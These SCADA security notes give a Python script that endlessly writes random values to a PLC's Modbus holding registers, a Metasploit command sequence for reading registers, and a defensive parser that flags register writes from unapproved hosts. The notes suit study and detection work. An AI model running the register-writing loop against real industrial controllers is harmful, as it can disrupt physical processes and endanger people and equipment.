SCADA Security Notes

Modbus write random registers

# pymodbus 2.x import path; '[target]' is a placeholder for the PLC's IP address.
from pymodbus.client.sync import ModbusTcpClient
import multiprocessing
import random
from multiprocessing import TimeoutError

client = ModbusTcpClient('[target]')
client.connect()

def write(reg):
    # Modbus function code 6 (Write Single Register): holding registers 1..20
    # each receive a random value between 1 and 100. Modbus/TCP has no
    # authentication, so any host that can reach TCP/502 can issue this.
    client.write_register(reg+1, random.randint(1, 100))
    print('reg:' + str(reg))

if __name__ == '__main__':

    while True:
        p = multiprocessing.Pool(2)
        try:
            p.map(write, [x for x in range(20)])
        except TimeoutError:
            pass
        except Exception as e:
            print(e)
            client.close()  # the loop only ends here, so close the connection before exiting
            exit()

Read and write data to a PLC with metasploit

use auxiliary/scanner/scada/modbusclient
set DATA_ADDRESS 1
set RHOST [target]
set ACTION READ_REGISTERS
set NUMBER 19
run
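Both snippets above produce plain Modbus/TCP traffic: function code 6 writes to registers 1..20 from the script, and a function code 3 read of 19 registers starting at address 1 from the Metasploit module. The following added example (not part of the original notes) decodes such frames from the MBAP header and flags register writes from hosts that are not on a write allowlist; the frames, IP addresses and allowlist are constructed sample data.

```python
# Added example: decode Modbus/TCP request frames and flag register writes
# from hosts not approved to write. All frames and addresses are constructed.
import struct

# Function codes seen in the notes: 3 = Read Holding Registers,
# 6 = Write Single Register, 16 = Write Multiple Registers.
FC_NAMES = {3: "READ_HOLDING_REGISTERS", 6: "WRITE_SINGLE_REGISTER",
            16: "WRITE_MULTIPLE_REGISTERS"}
WRITE_FCS = {5, 6, 15, 16}  # coil and register write function codes

def parse_modbus_tcp(frame: bytes) -> dict:
    """Parse the 7-byte MBAP header and the start of the PDU."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header + function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError("protocol id must be 0 for Modbus/TCP")
    if length != len(frame) - 6:  # length counts unit id + PDU bytes
        raise ValueError("MBAP length field does not match frame size")
    fc = frame[7]
    req = {"tid": tid, "unit": unit, "fc": fc, "name": FC_NAMES.get(fc, "OTHER")}
    if fc in (3, 6):
        # Both carry a 16-bit address followed by a 16-bit quantity (FC 3) or value (FC 6).
        addr, second = struct.unpack(">HH", frame[8:12])
        req["address"] = addr
        req["quantity" if fc == 3 else "value"] = second
    elif fc == 16:
        addr, qty, byte_count = struct.unpack(">HHB", frame[8:13])
        req.update(address=addr, quantity=qty, byte_count=byte_count)
    return req

def check_request(src_ip: str, frame: bytes, writers_allowed: set) -> dict:
    """Parsed request plus an 'alert' string when a write comes from an unapproved host."""
    req = parse_modbus_tcp(frame)
    req["alert"] = None
    if req["fc"] in WRITE_FCS and src_ip not in writers_allowed:
        req["alert"] = f"{req['name']} from unapproved host {src_ip}"
    return req

# Constructed sample: one engineering workstation may write, nothing else.
ALLOWED_WRITERS = {"10.0.0.5"}
# FC 6: write value 42 to holding register 5 (the pattern the script above produces).
WRITE_FRAME = bytes.fromhex("0001" "0000" "0006" "01" "06" "0005" "002a")
# FC 3: read 19 holding registers starting at address 1 (the msf module's query).
READ_FRAME = bytes.fromhex("0002" "0000" "0006" "01" "03" "0001" "0013")

if __name__ == "__main__":
    for ip, frame in (("10.0.0.99", WRITE_FRAME), ("10.0.0.99", READ_FRAME)):
        r = check_request(ip, frame, ALLOWED_WRITERS)
        print(r["name"], r.get("address"), r["alert"])
```

In practice the frames would come from a capture or network tap on TCP/502 and the allowlist from the site's asset inventory; the read from an unknown host is not alerted here but is still worth logging.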